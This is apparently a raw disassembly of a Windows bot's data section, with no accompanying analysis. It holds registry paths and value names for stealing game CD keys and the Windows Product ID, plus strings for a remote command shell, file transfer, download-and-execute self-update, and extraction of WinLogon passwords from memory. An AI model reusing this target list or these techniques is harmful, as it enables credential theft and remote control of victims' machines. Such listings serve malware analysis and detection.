aTheGladiators db 'The Gladiators',0
align 4
aSoftwareValveG db 'Software\Valve\Gunman\Settings',0
align 4
aKey_0 db 'Key',0
aGunmanChronicl db 'Gunman Chronicles',0
align 4
aSoftwareValveH db 'Software\Valve\Half-Life\Settings',0
align 4
aKey_1 db 'Key',0
aHalfLife db 'Half-Life',0
align 4
aSoftwareJowood db 'Software\JoWooD\InstalledGames\IG2',0
align 4
aPrvkey db 'prvkey',0
align 4
aIndustryGiant2 db 'Industry Giant 2',0
align 4
aSoftware3d0Sta db 'Software\3d0\Status',0
aCustomernumber db 'CustomerNumber',0
align 4
aLegendsOfMight db 'Legends of Might and Magic',0
align 4
aSoftwareSilver db 'Software\Silver Style Entertainment\Soldiers Of Anarchy\Settings',0
align 4
aCdkey_0 db 'CDKey',0
align 4
aSoldiersOfAnar db 'Soldiers Of Anarchy',0
aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion',0
align 4
aProductid db 'ProductId',0
align 10h
aMicrosoftWindo db 'Microsoft Windows Product ID',0
align 10h
aSoftwareUnreal db 'Software\Unreal Technology\Installed Apps\UT2003',0
align 4
aCdkey_1 db 'CDKey',0
align 4
aUnrealTourname db 'Unreal Tournament 2003',0
align 4
aSoftwareUnre_0 db 'Software\Unreal Technology\Installed Apps\UT2004',0
align 4
aCdkey_2 db 'CDKey',0
align 10h
aUnrealTourna_0 db 'Unreal Tournament 2004',0
align 4
aSoftwareIgi2Re db 'Software\IGI 2 Retail',0
align 10h
aCdkey_3 db 'CDKey',0
align 4
aIgi2CovertStri db 'IGI 2: Covert Strike',0
align 10h
aSoftwareElectr db 'Software\Electronic Arts\EA Distribution\Freedom Force\ergc',0
aFreedomForce db 'Freedom Force',0
align 4
aSoftwareElec_0 db 'Software\Electronic Arts\EA GAMES\Battlefield 1942\ergc',0
aBattlefield194 db 'Battlefield 1942',0
align 4
aSoftwareElec_1 db 'Software\Electronic Arts\EA GAMES\Battlefield 1942 The Road to Ro'
db 'me\ergc',0
align 4
aBattlefield1_0 db 'Battlefield 1942 (Road To Rome)',0
align 8
aSoftwareElec_2 db 'Software\Electronic Arts\EA GAMES\Battlefield 1942 Secret Weapons'
db ' of WWII\ergc',0
align 4
aBattlefield1_1 db 'Battlefield 1942 (Secret Weapons of WWII)',0
align 4
aSoftwareElec_3 db 'Software\Electronic Arts\EA GAMES\Battlefield Vietnam\ergc',0
align 10h
aBattlefieldVie db 'Battlefield Vietnam',0
aSoftwareElec_4 db 'Software\Electronic Arts\EA GAMES\Black and White\ergc',0
align 4
aBlackAndWhite db 'Black and White',0
align 10h
aSoftwareElec_5 db 'Software\Electronic Arts\EA GAMES\Command and Conquer Generals Ze'
db 'ro Hour\ergc',0
align 10h
aCommandAndConq db 'Command and Conquer: Generals (Zero Hour)',0
align 10h
aSoftwareElec_6 db 'Software\Electronic Arts\EA GAMES\James Bond 007 Nightfire\ergc',0
aJamesBond007Ni db 'James Bond 007: Nightfire',0
align 4
aSoftwareElec_7 db 'Software\Electronic Arts\EA GAMES\Generals\ergc',0
aCommandAndCo_0 db 'Command and Conquer: Generals',0
align 4
aSoftwareElec_8 db 'Software\Electronic Arts\EA GAMES\Global Operations\ergc',0
align 4
aGlobalOperatio db 'Global Operations',0
align 10h
aSoftwareElec_9 db 'Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault\e'
db 'rgc',0
align 4
aMedalOfHonorAl db 'Medal of Honor: Allied Assault',0
align 4
aSoftwareEle_10 db 'Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault B'
db 'reakthrough\ergc',0
align 4
aMedalOfHonor_0 db 'Medal of Honor: Allied Assault: Breakthrough',0
align 10h
aSoftwareEle_11 db 'Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault S'
db 'pearhead\ergc',0
align 10h
aMedalOfHonor_1 db 'Medal of Honor: Allied Assault: Spearhead',0
align 4
aSoftwareEle_12 db 'Software\Electronic Arts\EA GAMES\Need For Speed Hot Pursuit 2',0
align 4
aErgc db 'ergc',0
align 4
aNeedForSpeedHo db 'Need For Speed Hot Pursuit 2',0
align 8
aSoftwareEle_13 db 'Software\Electronic Arts\EA GAMES\Need For Speed Underground\ergc'
db 0
align 4
aNeedForSpeedUn db 'Need For Speed: Underground',0
aSoftwareEle_14 db 'Software\Electronic Arts\EA GAMES\Shogun Total War - Warlord Edit'
db 'ion\ergc',0
align 4
aShogunTotalWar db 'Shogun: Total War: Warlord Edition',0
align 4
aSoftwareEle_15 db 'Software\Electronic Arts\EA Sports\FIFA 2002\ergc',0
align 4
aFifa2002 db 'FIFA 2002',0
align 4
aSoftwareEle_16 db 'Software\Electronic Arts\EA Sports\FIFA 2003\ergc',0
align 4
aFifa2003 db 'FIFA 2003',0
align 4
aSoftwareEle_17 db 'Software\Electronic Arts\EA Sports\NHL 2002\ergc',0
align 4
aNhl2002 db 'NHL 2002',0
align 4
aSoftwareEle_18 db 'Software\Electronic Arts\EA Sports\NHL 2003\ergc',0
align 4
aNhl2003 db 'NHL 2003',0
align 4
aSoftwareEle_19 db 'Software\Electronic Arts\EA Sports\Nascar Racing 2002\ergc',0
align 4
aNascarRacing20 db 'Nascar Racing 2002',0
align 4
aSoftwareEle_20 db 'Software\Electronic Arts\EA Sports\Nascar Racing 2003\ergc',0
align 4
aNascarRacing_0 db 'Nascar Racing 2003',0
align 4
aSoftwareRedSto db 'Software\Red Storm Entertainment\RAVENSHIELD',0
align 4
aCdkey_4 db 'CDKey',0
align 10h
aRainbowSixIiiR db 'Rainbow Six III RavenShield',0
aSoftwareWestwo db 'Software\Westwood\Tiberian Sun',0
align 4
aSerial db 'Serial',0
align 4
aCommandAndCo_1 db 'Command and Conquer: Tiberian Sun',0
align 4
aSoftwareWest_0 db 'Software\Westwood\Red Alert',0
aSerial_0 db 'Serial',0
align 4
aCommandAndCo_2 db 'Command and Conquer: Red Alert',0
align 4
aSoftwareWest_1 db 'Software\Westwood\Red Alert 2',0
align 4
aSerial_1 db 'Serial',0
align 4
aCommandAndCo_3 db 'Command and Conquer: Red Alert 2',0
align 4
aSoftwareWest_2 db 'Software\Westwood\NOX',0
align 10h
aSerial_2 db 'Serial',0
align 4
aNox db 'NOX',0
aSoftwareTechla db 'Software\Techland\Chrome',0
align 4
aSerialnumber db 'SerialNumber',0
align 4
aChrome db 'Chrome',0
align 10h
aSoftwareIllusi db 'Software\Illusion Softworks\Hidden & Dangerous 2',0
align 4
aKey_2 db 'key',0
aHiddenDangerou db 'Hidden & Dangerous 2',0
align 10h
aSoftwareActivi db 'Software\Activision\Soldier of Fortune II - Double Helix',0
align 4
aInstallpath db 'InstallPath',0
aSoldierOfFortu db 'Soldier of Fortune II - Double Helix',0
align 10h
aBaseMpSof2key db 'base\mp\sof2key',0
aMtkwftmkemfew3 db 'mtkwftmkemfew3p3b7',0
align 4
aSoftwareBiowar db 'Software\BioWare\NWN\Neverwinter',0
align 4
aLocation db 'Location',0
align 4
aNeverwinterNig db 'Neverwinter Nights',0
align 4
aNwncdkey_ini db 'nwncdkey.ini',0
align 4
aKey1 db 'Key1=',0
align 10h
aSoftwareBiow_0 db 'Software\BioWare\NWN\Neverwinter',0
align 4
aLocation_0 db 'Location',0
align 10h
aNeverwinterN_0 db 'Neverwinter Nights (Shadows of Undrentide)',0
align 4
aNwncdkey_ini_0 db 'nwncdkey.ini',0
align 4
aKey2 db 'Key2=',0
align 4
aSoftwareBiow_1 db 'Software\BioWare\NWN\Neverwinter',0
align 4
aLocation_1 db 'Location',0
align 4
aNeverwinterN_1 db 'Neverwinter Nights (Hordes of the Underdark)',0
align 4
aNwncdkey_ini_1 db 'nwncdkey.ini',0
align 4
aKey3 db 'Key3=',0
align 10h
dd 80000001h
off_44E134 dd offset aSoftwareValveC ; DATA XREF: sub_41638E+C�r
; sub_41638E+21�o
; "Software\\Valve\\CounterStrike\\Settings"
dd offset aCdkey ; "CDKey"
dd offset aCounterStrikeR ; "Counter-Strike (Retail)"
dword_44E140 dd 2 dup(0) ; DATA XREF: sub_41638E+26�o
dd 80000001h, 44D2C8h, 44D2F0h, 44D2FCh, 2 dup(0)
dd 80000001h, 44D30Ch, 44D32Ch, 44D330h, 2 dup(0)
dd 80000001h, 44D344h, 44D368h, 44D36Ch, 2 dup(0)
dd 80000001h, 44D378h, 44D39Ch, 44D3A4h, 2 dup(0)
dd 80000001h, 44D3B8h, 44D3CCh, 44D3DCh, 2 dup(0)
dd 80000001h, 44D3F8h, 44D43Ch, 44D444h, 2 dup(0)
dd 80000002h, 44D458h, 44D484h, 44D490h, 2 dup(0)
dd 80000002h, 44D4B0h, 44D4E4h, 44D4ECh, 2 dup(0)
dd 80000002h, 44D504h, 44D538h, 44D540h, 2 dup(0)
dd 80000002h, 44D558h, 44D570h, 44D578h, 2 dup(0)
dd 80000002h, 44D590h, 4EABDCh, 44D5CCh, 2 dup(0)
dd 80000002h, 44D5DCh, 4EABDDh, 44D614h, 2 dup(0)
dd 80000002h, 44D628h, 4EABDEh, 44D674h, 2 dup(0)
dd 80000002h, 44D698h, 4EABDFh, 44D6E8h, 2 dup(0)
dd 80000002h, 44D714h, 4EABE0h, 44D750h, 2 dup(0)
dd 80000002h, 44D764h, 4EABE1h, 44D79Ch, 2 dup(0)
dd 80000002h, 44D7B0h, 4EABE2h, 44D800h, 2 dup(0)
dd 80000002h, 44D830h, 4EABE3h, 44D870h, 2 dup(0)
dd 80000002h, 44D88Ch, 4EABE4h, 44D8BCh, 2 dup(0)
dd 80000002h, 44D8DCh, 4EABE5h, 44D918h, 2 dup(0)
dd 80000002h, 44D930h, 4EABE6h, 44D978h, 2 dup(0)
dd 80000002h, 44D998h, 4EABE7h, 44D9ECh, 2 dup(0)
dd 80000002h, 44DA20h, 4EABE8h, 44DA70h, 2 dup(0)
dd 80000002h, 44DA9Ch, 44DADCh, 44DAE4h, 2 dup(0)
dd 80000002h, 44DB08h, 4EABE9h, 44DB4Ch, 2 dup(0)
dd 80000002h, 44DB68h, 4EABEAh, 44DBB4h, 2 dup(0)
dd 80000002h, 44DBD8h, 4EABEBh, 44DC0Ch, 2 dup(0)
dd 80000002h, 44DC18h, 4EABECh, 44DC4Ch, 2 dup(0)
dd 80000002h, 44DC58h, 4EABEDh, 44DC8Ch, 2 dup(0)
dd 80000002h, 44DC98h, 4EABEEh, 44DCCCh, 2 dup(0)
dd 80000002h, 44DCD8h, 4EABEFh, 44DD14h, 2 dup(0)
dd 80000002h, 44DD28h, 4EABF0h, 44DD64h, 2 dup(0)
dd 80000002h, 44DD78h, 44DDA8h, 44DDB0h, 2 dup(0)
dd 80000002h, 44DDCCh, 44DDECh, 44DDF4h, 2 dup(0)
dd 80000002h, 44DE18h, 44DE34h, 44DE3Ch, 2 dup(0)
dd 80000002h, 44DE5Ch, 44DE7Ch, 44DE84h, 2 dup(0)
dd 80000002h, 44DEA8h, 44DEC0h, 44DEC8h, 2 dup(0)
dd 80000002h, 44DECCh, 44DEE8h, 44DEF8h, 2 dup(0)
dd 80000002h, 44DF00h, 44DF34h, 44DF38h, 2 dup(0)
dd 80000002h, 44DF50h, 44DF8Ch, 44DF98h, 44DFC0h, 44DFD0h
dd 80000002h, 44DFE4h, 44E008h, 44E014h, 44E028h, 44E038h
dd 80000002h, 44E040h, 44E064h, 44E070h, 44E09Ch, 44E0ACh
dd 80000002h, 44E0B4h, 44E0D8h, 44E0E4h, 44E114h, 44E124h
dd 6 dup(0)
dword_44E568 dd 255C7325h ; DATA XREF: sub_41638E+79�o
aSr: ; DATA XREF: sub_41638E+8A�o
; sub_41638E+E1�o ...
unicode 0, <sr==>
dword_44E574 dd 234032Dh, 656B6463h, 3027379h, 7325202Dh, 7325203Ah
; DATA XREF: sub_41638E+101�o
dd 0
dword_44E58C dd 234032Dh, 656B6463h, 3027379h, 7325202Dh, 7325203Ah
; DATA XREF: sub_41638E+11B�o
dd 0
dword_44E5A4 dd 234032Dh, 656B6463h, 3027379h, 7325202Dh, 7325203Ah
; DATA XREF: sub_41638E+167�o
dd 0
unk_44E5BC db 2Dh ; - ; DATA XREF: sub_4165C7+47�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToOpenSo db '- failed to open socket',0
align 10h
unk_44E5E0 db 2Dh ; - ; DATA XREF: sub_4165C7+AB�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToOpenRe db '- failed to open remote command shell',0
align 10h
asc_44E610: ; DATA XREF: sub_4165C7+138�o
dw 0Ah
unicode 0, <>,0
unk_44E614 db 2Dh ; - ; DATA XREF: sub_4165C7+170�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToSendTo db '- failed to send to Remote command shell',0
align 4
unk_44E648 db 2Dh ; - ; DATA XREF: sub_416788+44�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToCrea_3 db '- failed to create socket',0
align 4
unk_44E66C db 2Dh ; - ; DATA XREF: sub_416788+82�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToBindTo db '- failed to bind to socket',0
unk_44E690 db 2Dh ; - ; DATA XREF: sub_416788+FD�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToOpen_0 db '- failed to open socket',0
align 4
unk_44E6B4 db 2Dh ; - ; DATA XREF: sub_416788+127�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFileDoesnTExis db '- file doesn',27h,'t exist',0
align 4
dword_44E6D4 dd 43434401h, 4E455320h, 73252044h, 20692520h, 25206925h
; DATA XREF: sub_416788+16A�o
dd 169h
dword_44E6EC dd 234032Dh, 2636364h, 73202D03h, 20646E65h, 656D6974h
; DATA XREF: sub_416788+1CB�o
dd 74756Fh
unk_44E704 db 2Dh ; - ; DATA XREF: sub_416788+202�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aUnableToOpenSo db '- unable to open socket',0
align 4
unk_44E728 db 2Dh ; - ; DATA XREF: sub_416788+2FA�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFileSSentToSSB db '- file %s sent to %s (%s bytes).',0
align 4
dword_44E754 dd 234032Dh, 2636364h, 73202D03h, 656B636Fh, 72652074h
; DATA XREF: sub_416788+36B�o
dd 726F72h
dword_44E76C dd 234032Dh, 2636364h, 73202D03h, 656B636Fh, 72652074h
; DATA XREF: sub_416788+37C�o
dd 726F72h
dword_44E784 dd 73257325h, 0 ; DATA XREF: sub_416B2D+54�o
unk_44E78C db 2Dh ; - ; DATA XREF: sub_416B2D+83�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aErrorUnableToW db '- error unable to write file to disk',0
align 4
aAB db 'a+b',0 ; DATA XREF: sub_416B2D+97�o
unk_44E7C0 db 2Dh ; - ; DATA XREF: sub_416B2D+AB�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aErrorOpeningFi db '- error opening file for writing',0
align 4
unk_44E7EC db 2Dh ; - ; DATA XREF: sub_416B2D+CB�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aErrorOpeningSo db '- error opening socket',0
dword_44E80C dd 234032Dh, 2636364h, 73202D03h, 656B636Fh, 72652074h
; DATA XREF: sub_416B2D+156�o
dd 726F72h
unk_44E824 db 2Dh ; - ; DATA XREF: sub_416B2D+1CF�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aReceivedSFromS db '- received %s from %s (%s bytes).',0
align 10h
unk_44E850 db 2Dh ; - ; DATA XREF: sub_416D68+77�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aCouldnTOpenF_0 db 'couldn',27h,'t open file: %s',0
align 4
unk_44E878 db 2Dh ; - ; DATA XREF: sub_416D68+191�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloadedSDkb db 'downloaded %s (%dKB)',0
align 10h
unk_44E8A0 db 2Dh ; - ; DATA XREF: sub_416D68:loc_416F00�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aGotUpdateSDkb_ db 'got update %s (%dKB).',0
align 4
unk_44E8C8 db 2Dh ; - ; DATA XREF: sub_416D68+1CD�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aWrongFilesizeD db 'wrong filesize (%d != %d).',0
align 4
unk_44E8F4 db 2Dh ; - ; DATA XREF: sub_416D68+257�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aWrongCrcDD_ db 'wrong crc (%d != %d).',0
align 4
unk_44E91C db 2Dh ; - ; DATA XREF: sub_416D68+2D6�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloaded_1fK db 'downloaded %.1f KB to %s @ %.1f KB/sec',0
align 4
aOpen_2 db 'open',0 ; DATA XREF: sub_416D68+32B�o
align 4
dword_44E95C dd 234032Dh, 6E776F64h, 64616F6Ch, 202D0302h, 6E65706Fh
; DATA XREF: sub_416D68+34D�o
dd 25206465h, 73h
unk_44E978 db 2Dh ; - ; DATA XREF: sub_416D68+3B6�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloaded_1fk db 'downloaded %.1fKB to %s @ %.1fKB/sec, updating bot',0
align 4
unk_44E9BC db 2Dh ; - ; DATA XREF: sub_416D68+472�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aUpdateFailedEr db 'update failed, error executing %s',0
align 10h
unk_44E9F0 db 2Dh ; - ; DATA XREF: sub_416D68+480�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aBadUrlOrDnsErr db 'bad url or dns error at %s.',0
a?_0: ; DATA XREF: sub_4172FC+1F�o
unicode 0, <?>,0
off_44EA20 dd offset word_4D4152 ; DATA XREF: sub_4172FC:loc_417321�o
aCdrom db 'Cdrom',0 ; DATA XREF: sub_4172FC:loc_417327�o
align 4
aNetwork db 'Network',0 ; DATA XREF: sub_4172FC:loc_41732D�o
aDisk db 'Disk',0 ; DATA XREF: sub_4172FC:loc_417333�o
align 4
aInvalid db 'Invalid',0 ; DATA XREF: sub_4172FC:loc_417339�o
aUnknown_1 db 'Unknown',0 ; DATA XREF: sub_4172FC:loc_41733F�o
aSkb db '%sKB',0 ; DATA XREF: sub_41738D+70�o
align 4
aSkb_0 db '%sKB',0 ; DATA XREF: sub_41738D+9B�o
align 4
aSkb_1 db '%sKB',0 ; DATA XREF: sub_41738D+C6�o
align 4
aFailed db 'failed',0 ; DATA XREF: sub_41738D+E0�o
align 4
aFailed_0 db 'failed',0 ; DATA XREF: sub_41738D+F1�o
align 4
aFailed_1 db 'failed',0 ; DATA XREF: sub_41738D+102�o
align 4
aFailed_2 db 'failed',0 ; DATA XREF: sub_4174B1+3B�o
align 4
unk_44EA84 db 2Dh ; - ; DATA XREF: sub_4174B1+58�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aSDriveSFailedT db '%s drive (%s): failed to stat, device not ready',0
unk_44EAC0 db 2Dh ; - ; DATA XREF: sub_4174B1+8E�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aSDriveSSTotalS db '%s drive (%s): %s total, %s free, %s available',0
align 4
aA_2 db 'A:\',0 ; DATA XREF: sub_417583:loc_4175C8�o
unk_44EB00 db 2Dh ; - ; DATA XREF: sub_417606+5C�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aSearchingFor_0 db 'searching for file %s',0
align 4
dword_44EB28 dd 234032Dh, 646E6966h, 656C6966h, 202D0302h, 6E756F66h
; DATA XREF: sub_417606+C5�o
dd 64252064h, 6C696620h, 7365h
dword_44EB48 dd 2A5C7325h, 0 ; DATA XREF: sub_41771E+1A�o
dword_44EB50 dd 255C7325h, 73h ; DATA XREF: sub_41771E+7A�o
dword_44EB58 dd 255C7325h, 73h ; DATA XREF: sub_41771E+CE�o
dword_44EB60 dd 234032Dh, 646E6966h, 656C6966h, 202D0302h, 6E756F66h
; DATA XREF: sub_41771E+107�o
dd 73252064h, 73255Ch, 0
unk_44EB80 db 2Dh ; - ; DATA XREF: sub_41786C+35�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aOnlySupportedO db 'only supported on winnt/win2k',0
align 10h
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_41786C+40�o
align 4
aNtdll_dll db 'NTDLL.DLL',0 ; DATA XREF: sub_41786C+55�o
align 10h
aNtquerysystemi db 'NtQuerySystemInformation',0 ; DATA XREF: sub_41786C+68�o
align 4
aRtlcreatequery db 'RtlCreateQueryDebugBuffer',0 ; DATA XREF: sub_41786C+73�o
align 4
aRtlqueryproces db 'RtlQueryProcessDebugInformation',0 ; DATA XREF: sub_41786C+80�o
aRtldestroyquer db 'RtlDestroyQueryDebugBuffer',0 ; DATA XREF: sub_41786C+8D�o
align 4
aRtlrundecodeun db 'RtlRunDecodeUnicodeString',0 ; DATA XREF: sub_41786C+9A�o
align 10h
aUsername: ; DATA XREF: sub_41786C+CE�o
unicode 0, <USERNAME>,0
align 4
aUserdomain: ; DATA XREF: sub_41786C+DC�o
unicode 0, <USERDOMAIN>,0
align 10h
unk_44EC90 db 2Dh ; - ; DATA XREF: sub_41786C+117�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
db 57h ; W
db 69h, 6Eh, 4Ch
db 6Fh ; o
db 67h, 6Fh, 6Eh
db 20h
db 49h, 6Eh, 66h
db 6Fh ; o
db 72h, 6Dh, 61h
db 74h ; t
db 69h, 6Fh, 6Eh
db 20h
db 28h, 50h, 49h
db 44h ; D
db 20h, 25h, 64h
db 29h ; )
db 20h, 2Dh, 20h
db 2
db 44h, 6Fh, 6Dh
db 61h ; a
db 69h, 6Eh, 2
db 3Ah ; :
db 20h, 2 dup(5Ch)
db 25h ; %
db 53h, 2Ch, 20h
db 2
db 55h, 73h, 65h
db 72h ; r
db 2, 3Ah, 20h
aSNoPassword_ db '(%S/(no password)).',0
unk_44ECEC db 2Dh ; - ; DATA XREF: sub_41786C:loc_4179B1�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aUnableToFindTh db 'unable to find the password in memory',0
align 4
unk_44ED24 db 2Dh ; - ; DATA XREF: sub_41786C:loc_4179B8�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aUnableToFindWi db 'unable to find winlogon pid',0
aSedebugprivi_0 db 'SeDebugPrivilege',0 ; DATA XREF: sub_41786C+161�o
align 4
unk_44ED64 db 2Dh ; - ; DATA XREF: sub_41786C:loc_4179E5�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aFailedToEnable db 'failed to enable debug privilege',0
align 4
aWinlogon db 'WINLOGON',0 ; DATA XREF: sub_417A3E+AF�o
align 4
aNwgina db 'NWGINA',0 ; DATA XREF: sub_417A3E+123�o
align 4
aMsgina db 'MSGINA',0 ; DATA XREF: sub_417A3E+13E�o
align 8
dword_44EDB8 dd 234032Dh, 646E6966h, 73736170h, 202D0302h, 4C6E6957h
; DATA XREF: sub_417E98+70�o
dd 6E6F676Fh, 666E4920h, 616D726Fh, 6E6F6974h, 49502820h
dd 64252044h, 202D2029h, 6D6F4402h, 26E6961h, 5C5C203Ah
dd 202C5325h, 65735502h, 203A0272h, 2F532528h, 295325h
dword_44EE08 dd 234032Dh, 646E6966h, 73736170h, 202D0302h, 4C6E6957h
; DATA XREF: sub_417F2F+C7�o
dd 6E6F676Fh, 666E4920h, 616D726Fh, 6E6F6974h, 49502820h
dd 64252044h, 202D2029h, 6D6F4402h, 26E6961h, 5C5C203Ah
dd 202C5325h, 65735502h, 203A0272h, 2F532528h, 295325h
dword_44EE58 dd 234032Dh, 646E6966h, 73736170h, 202D0302h, 4C6E6957h
; DATA XREF: sub_417F2F+E1�o
dd 6E6F676Fh, 666E4920h, 616D726Fh, 6E6F6974h, 49502820h
dd 64252044h, 202D2029h, 6D6F4402h, 26E6961h, 5C5C203Ah
dd 202C5325h, 65735502h, 203A0272h, 2F532528h, 412F4E28h
dd 2929h, 0
aQwertyuipasdfg: ; DATA XREF: _2:off_44F430�o
; _2:0044F434�o ...
unicode 0, <qwertyuipasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM>,0
aSmartmir db 'SMARTMIR',0 ; DATA XREF: _2:0044F4FC�o
align 4
aFarooq db 'farooq',0 ; DATA XREF: _2:0044F500�o
align 4
aMaxxguy db 'maxxguy',0 ; DATA XREF: _2:0044F504�o
aBobmarley db 'BOBMARLEY',0 ; DATA XREF: _2:0044F508�o
align 10h
aEmilya db 'emilya',0 ; DATA XREF: _2:0044F50C�o
align 4
aKrizha db 'KRIZHA',0 ; DATA XREF: _2:0044F510�o
align 10h
aCar1nna db 'Car1nna',0 ; DATA XREF: _2:0044F514�o
aSwin db 'swin',0 ; DATA XREF: _2:0044F518�o
align 10h
aMale db 'male',0 ; DATA XREF: _2:0044F51C�o
align 4
aKoko db 'koko',0 ; DATA XREF: _2:0044F520�o
align 10h
aFlexster db 'flexster',0 ; DATA XREF: _2:0044F524�o
align 4
aKen db 'ken',0 ; DATA XREF: _2:0044F528�o
aShez db 'Shez',0 ; DATA XREF: _2:0044F52C�o
align 4
aTalika db 'talika',0 ; DATA XREF: _2:0044F530�o
align 10h
aMarcy db 'marcy',0 ; DATA XREF: _2:0044F534�o
align 4
aCme db 'cme',0 ; DATA XREF: _2:0044F538�o
aHeval db 'heval',0 ; DATA XREF: _2:0044F53C�o
align 4
aBunty db 'bunty',0 ; DATA XREF: _2:0044F540�o
align 4
aJanno db 'janno',0 ; DATA XREF: _2:0044F544�o
align 4
aRimpy db 'rimpy',0 ; DATA XREF: _2:0044F548�o
align 4
aNastysha db 'nastysha',0 ; DATA XREF: _2:0044F54C�o
align 4
aLuisa db 'Luisa',0 ; DATA XREF: _2:0044F550�o
align 10h
aTroller db 'troller',0 ; DATA XREF: _2:0044F554�o
aManee db 'manee',0 ; DATA XREF: _2:0044F558�o
align 10h
aKermit db 'kermit',0 ; DATA XREF: _2:0044F55C�o
align 4
aPuregold db 'puregold',0 ; DATA XREF: _2:0044F560�o
align 4
aCoredump db 'CoreDump',0 ; DATA XREF: _2:0044F564�o
align 10h
aImra db 'imra',0 ; DATA XREF: _2:0044F568�o
align 4
aGirl db 'GirL',0 ; DATA XREF: _2:0044F56C�o
align 10h
aCamel db 'CAMEL',0 ; DATA XREF: _2:0044F570�o
align 4
aReshma db 'reshma',0 ; DATA XREF: _2:0044F574�o
align 10h
aKencing db 'Kencing',0 ; DATA XREF: _2:0044F578�o
aThr45h3r5 db 'THR45H3R5',0 ; DATA XREF: _2:0044F57C�o
align 4
aCansuuuu db 'cansuuuu',0 ; DATA XREF: _2:0044F580�o
align 10h
aKaan38dent db 'kaan38dent',0 ; DATA XREF: _2:0044F584�o
align 4
aErkan27 db 'erkan27',0 ; DATA XREF: _2:0044F588�o
aHexaaa db 'hexaaa',0 ; DATA XREF: _2:0044F58C�o
align 4
aBerk19 db 'berk19',0 ; DATA XREF: _2:0044F590�o
align 4
aObenibisevse db 'OBeNiBiSeVSe',0 ; DATA XREF: _2:0044F594�o
align 4
aIrmal db 'irmal',0 ; DATA XREF: _2:0044F598�o
align 4
aMisssunday db 'misssunday',0 ; DATA XREF: _2:0044F59C�o
align 4
aTolga34 db 'Tolga34',0 ; DATA XREF: _2:0044F5A0�o
aJericho db 'JERICHO',0 ; DATA XREF: _2:0044F5A4�o
aMary_0 db 'MARY',0 ; DATA XREF: _2:0044F5A8�o
align 10h
aAkin db 'AKIN',0 ; DATA XREF: _2:0044F5AC�o
align 4
aMelekk db 'melekk',0 ; DATA XREF: _2:0044F5B0�o
align 10h
aTrend3 db 'trend3',0 ; DATA XREF: _2:0044F5B4�o
align 4
aMERVE db 'M-E-R-V-E',0 ; DATA XREF: _2:0044F5B8�o
align 4
aTekir db 'tekir',0 ; DATA XREF: _2:0044F5BC�o
align 4
aVenedik34 db 'venedik34',0 ; DATA XREF: _2:0044F5C0�o
align 4
aSevmekmi db 'sevmekmi',0 ; DATA XREF: _2:0044F5C4�o
align 4
aSudenur db 'SUDENUR',0 ; DATA XREF: _2:0044F5C8�o
aArzu db 'ARZU',0 ; DATA XREF: _2:0044F5CC�o
